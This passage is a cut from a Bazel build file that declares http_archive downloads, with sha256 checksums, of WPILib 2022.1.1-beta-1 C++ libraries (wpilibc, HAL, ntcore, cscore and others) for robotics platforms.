"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "9cccf85bd6d0a576174d2bc352eda5f46fbba2878ff74a33711f99c21d0e3467",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "042f30b8ff66f862868df5557d38b1518f85641ad3b824b13e5804137da0955e",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "19076d7738bdcf3351286750abcd63cf3b9be3ae094975c1a44212d618ffdd93",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "c1a67b54dece57acefc92a888f85320b1623fa1d3e55b6b36721841c0a0c8926",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "88834ad637e9c7a3b92c1dca72a7a18b00f67e711ab4e51125bfff44996c5331",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "ee96572633364a858348ecfd781a54a915ec44e61ff66c74d115dc5a25667788",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpilibc_wpilibc-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibc/wpilibc-cpp/2022.1.1-beta-1/wpilibc-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "3811ded44c6350f51047b115a50c713fdeb81e68f47b6fb0c17131117e7d9f9b",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "ccb9f76f81afde7100eee4940a19d5ccd5cba8a558570b9a1f1a051430a6d262",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "9711645efa98f61a9634ce2bd68a1aae56bcfcd9944b8ada2bd7564480f5d66e",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "2ac30bba83f507dfa4b63bb9605153a5f40b95d4f17ae91229c96fe9ea0cd4ac",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "da54ece30b3d429f1a6263b90a316e9ab4f891176412704be9825225e39afaf3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "8299fbc2e2ac770deabf4c6cd37cfa1a8efef9fd700a3f2ca99d7e1c6a6ec40d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "217867fabddf6331c0aa950431e3d2c6430f8afee5754736a96c904431abc557",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "c090c7a22f179b0987fec03f603656b1ec5ce1666ba4c70ef8473a9a7803a075",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "0386e15436bd22dffb4e18829c0bc58c19d7520512bc7c9af92b494ef33f41ce",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "a4f8a16b4082577733d10ba420fcae5174ceaec7f42260fb60197fb317f89335",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_hal_hal-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/hal/hal-cpp/2022.1.1-beta-1/hal-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "8913794392a9a8a33577f454e0ad055f9985d9b54dc7857e06b85fc2944d5de7",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "0959646557ae65cc3be8894ee8d39beb7c951ffd6be993ab58c709851069bdf3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "1fb70cd539e29463bb468a5fd4f8342fdbfd51fbe123abb3183eeb69ba18831b",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "cc10bb439a75f6d97f89761ed27cc1df12dffd330d6fc052383a21d8a9575ffb",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "fcfc83f420f57549d1f8068edd1e1182f2c5bc7562caca6129326ba116621d5d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "4dfff5233bb7b0b8ea3c4b9eefc31d0c17fd0962ffaf785ec87305bd6b55e5da",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "3c54a5440519e4001fdd3e3e4c7f4a5c9cc26c7a4d6910bc0a5b66e5fa4459be",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "099125e210b1a3ddcd1854bbfa236dbe6477dd1bd6ed7dcc1c95f12b0e212a61",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "fbf604a990af907944923157c20d33d3bc2050cf40a719abdd3c14344e69f4b2",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "6efa9420ef875cd69a4d3d55ebfde2b9ed0ed2bd61db9811dcb2e274b0ae56d8",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiutil_wpiutil-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpiutil/wpiutil-cpp/2022.1.1-beta-1/wpiutil-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "ed55b6ea290b075a9a7f1c94852a50c1a5e28ce3e01d3cab713811eeca03803d",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "099448b290666ca9d594e28fb21c5b4d199b31669d61d8d26b7b837245f74dc3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "aad15ca5bd6976730465ba1896f07576529e8384a2a3740ab60345a430ff0bb3",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "389018e731f998c8fe2ce42e80cf2eae60935a386d3c40af54f7cf9159e9a70e",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "98483d6dea79148389d25ce0ece2ea474d43a041d39aaaf3998bc51a2b109b53",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "07989a5109f6aab4fab038fb36b25511b965d0179bdcf7ba13b6d200d77592e4",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "c0acb88ac54d06cebba5374aa6ef10ba9f4f6019c1352718c5d8ce70232a55d6",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "5b3623a3f6d87f33d98cec7d6e6a7bb1983bf43f1056d9983fbb4c15d269821a",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "765bdd0196a487125b4076dd5eaabfaf2c4a0e37391a975592c3d141e7ae39e0",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "403322df2c7637bc0c47e5437d4fea678962375989149f5ae6ecf81810b80d67",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_ntcore_ntcore-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/ntcore/ntcore-cpp/2022.1.1-beta-1/ntcore-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "db0e677a833054cccb0df6eefcad8888970f2b9c65a7b0c6211ce1969c32acb2",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "86090d1cde7a10662abb7e163f5920e743ca0210a72691f3edaaa7501bd7381a",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "b4d6c1a57c398dd131baa5632e66257d139c22620b31637abfb9cb2eec641fa2",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "064beaffc16feee23c01a868cfc6b548537badc5332a0cc753f5714dedb0f6d3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "403826a614ed8a46720b52f89d8d337ce6cc89c55bddde29667af65b7f1d9d79",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "e89d7504bea9ae7007bc80b13d595451e2486f449dd3c1878783000dcc95fc80",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "48ebd0fe7e162ac5a624055768e07237278885657697e8533cad5bd8656b5373",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "6c224639a477f789cc4198022bf07014ccd28a7643025e8bcd8157d300d42753",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "3737e59c8c0d70b3926426f3fba0c3f7c9275d5c6dbaf68708631578de6ff8a1",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "5dfd502ac49fc6f0fa33727b2078389ac3616ee995b9878b34d85e07d908ed0a",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpimath_wpimath-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpimath/wpimath-cpp/2022.1.1-beta-1/wpimath-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "edaf77f5ee765213fac1c39169c8cf7568cf6a0e1fe1841cea56385f10a4483a",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "47885af110d9faca20b952fcb952563ba0aef3dd7aab9b9693712d63b96f46a3",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "ed2ba5e2be2542de80ae974f29b47e9a788184425497e88b65ca6525d3ea0ce0",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "1a2860600a2265578b5eb4ee04bf54286fd6a853a46821d299e40d2828fd5162",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "5f6e5dd516217cae42849a83b58a4072d4df0250aac0d5c704cba400cc7a2b7f",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "85c1840acbb9592776e788cf352c64f0ceaa2f17167290211940c0e6f6affe12",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "c53615899910ae011f21824ec0cbfb462d0ad8a8630ddef9576674bfa6238d32",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "414c15f0fcc21ef814a515af73319284193817784766e963bf548ea088c32912",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "598281e2232aa2adfa56a64359e2c26fde8ac211fac2e76ef8bb28ce7875759c",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "0c5abbef3b75a0c628a25fd5c5f014d1fd13f4e6f9a142e3c44fdcc7ce3ee5a2",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cameraserver_cameraserver-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cameraserver/cameraserver-cpp/2022.1.1-beta-1/cameraserver-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "e4c046e19b1aef915f501dcfc7944abd608412d080c064d788610f5a470d0a28",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "382221f7ba2942cf74e96a56a3a2d8d2a581ff1a187d4fdc26970520ffa36eaf",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "98889140f84057385ca8263405ade9b11a552ca3bacbbaa327f32515d16e0bec",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "d5bbb852db8ba3345495bbd1fe865f3d650a13349a1d0fb8c401de702bc1206f",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "ed33579479ed14b317995507782a35a18c49569705d72f5118004093c6b9a7ae",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "bb2fd292aeb59e3c05b495cdf3889885601fc1de5520597b779dd1bc90976db9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "be3c019597b8787c05d0c0c82096466a00d622e8bc8e1cb58569dfff28ab66d3",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_linuxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-linuxx86-64static.zip",
sha256 = "dde2724d4c88fe659aea7b855ae4ab55105963c2a2f5db6ebca93f6f49b89a42",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_osxx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-osxx86-64static.zip",
sha256 = "47d3c6b7fae8808eda0c31a148890f43cbd7093b499d869bb48dece5ccb6c7f1",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_headers",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-headers.zip",
sha256 = "95d3cd2305e89dec7d82e6ece371d95b1786ac456ac6277f6a2746febeb73d1c",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_cscore_cscore-cpp_sources",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/cscore/cscore-cpp/2022.1.1-beta-1/cscore-cpp-2022.1.1-beta-1-sources.zip",
sha256 = "ab6536f368e736c97edd79ed018a129549fa5cf9810b6bfd509a267fb17e594d",
build_file_content = cc_library_sources,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxathena",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxathena.zip",
sha256 = "475483064284e6922327b0d58bf3511ca4671f7b527d37a014217c995516d12c",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxathenastatic",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxathenastatic.zip",
sha256 = "a70860defafb87cf2f09fe5a2495ae5d7332fe5de1a46c4832e06febfca3e3b1",
build_file_content = cc_library_static,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_windowsx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-windowsx86-64.zip",
sha256 = "ed3a372a0ee57db77f9021f3494e52fdd36afeeb076211d37a4df438a299b3c9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_linuxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-linuxx86-64.zip",
sha256 = "4f60f242a3fc52aa409266ba9590c61bf6e4f52c88d2da863ef0d69fa0144de4",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_osxx86-64",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-osxx86-64.zip",
sha256 = "66ee7560050f7fd4465642da518d3e05088e5417b3d0fa4f715f14ec25b3b4f1",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_edu_wpi_first_wpiliboldcommands_wpiliboldcommands-cpp_windowsx86-64static",
url = "https://frcmaven.wpi.edu/release/edu/wpi/first/wpilibOldCommands/wpilibOldCommands-cpp/2022.1.1-beta-1/wpilibOldCommands-cpp-2022.1.1-beta-1-windowsx86-64static.zip",
sha256 = "4257f7c892132c3253a3dc35afbf12323cd1fc715537278276e1a6db12b1c002",
build_file_content = cc_library_static,
)
maybe(
http_archive,
